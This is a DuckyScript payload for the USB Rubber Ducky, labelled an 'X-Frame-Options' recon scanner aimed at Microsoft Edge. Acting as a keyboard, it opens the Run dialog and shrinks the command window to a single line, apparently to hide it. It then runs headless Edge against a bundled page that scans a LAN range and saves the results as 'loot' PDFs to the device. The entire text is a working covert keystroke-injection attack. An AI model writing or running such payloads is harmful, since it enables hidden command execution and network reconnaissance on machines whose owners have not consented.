REM TITLE : "X-Frame-Options" Scanner
REM AUTHOR : TW-D
REM TARGET : Microsoft Edge
REM VERSION : 1.0
REM CATEGORY : Recon
REM REQUIREMENT : DuckyScript 3.0

ATTACKMODE HID STORAGE
DELAY 10000

REM ---
REM USB Rubber Ducky label.
REM ---
DEFINE #RD_LABEL DUCKY

REM ---
REM Format of an allowed IPv4 address range.
REM 192.168.0.X-192.168.0.Y where (X < Y)
REM ---
DEFINE #LAN 192.168.0.1-192.168.0.50

SAVE_HOST_KEYBOARD_LOCK_STATE

IF ( $_CAPSLOCK_ON ) THEN
    CAPSLOCK
    DELAY 500
END_IF

IF ( $_NUMLOCK_ON == FALSE ) THEN
    NUMLOCK
    DELAY 500
END_IF

GUI r
DELAY 1500
STRINGLN CMD /K "MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveLetter^, Label^|FINDSTR "#RD_LABEL"') DO @SET RD_LABEL=%d"
DELAY 2000
STRINGLN START MSEDGE --headless --disable-gpu --run-all-compositor-stages-before-draw --print-to-pdf="%RD_LABEL%\loot_%RANDOM%.pdf" "%RD_LABEL%\recon_files\index.html?lan=#LAN" && EXIT

RESTORE_HOST_KEYBOARD_LOCK_STATE
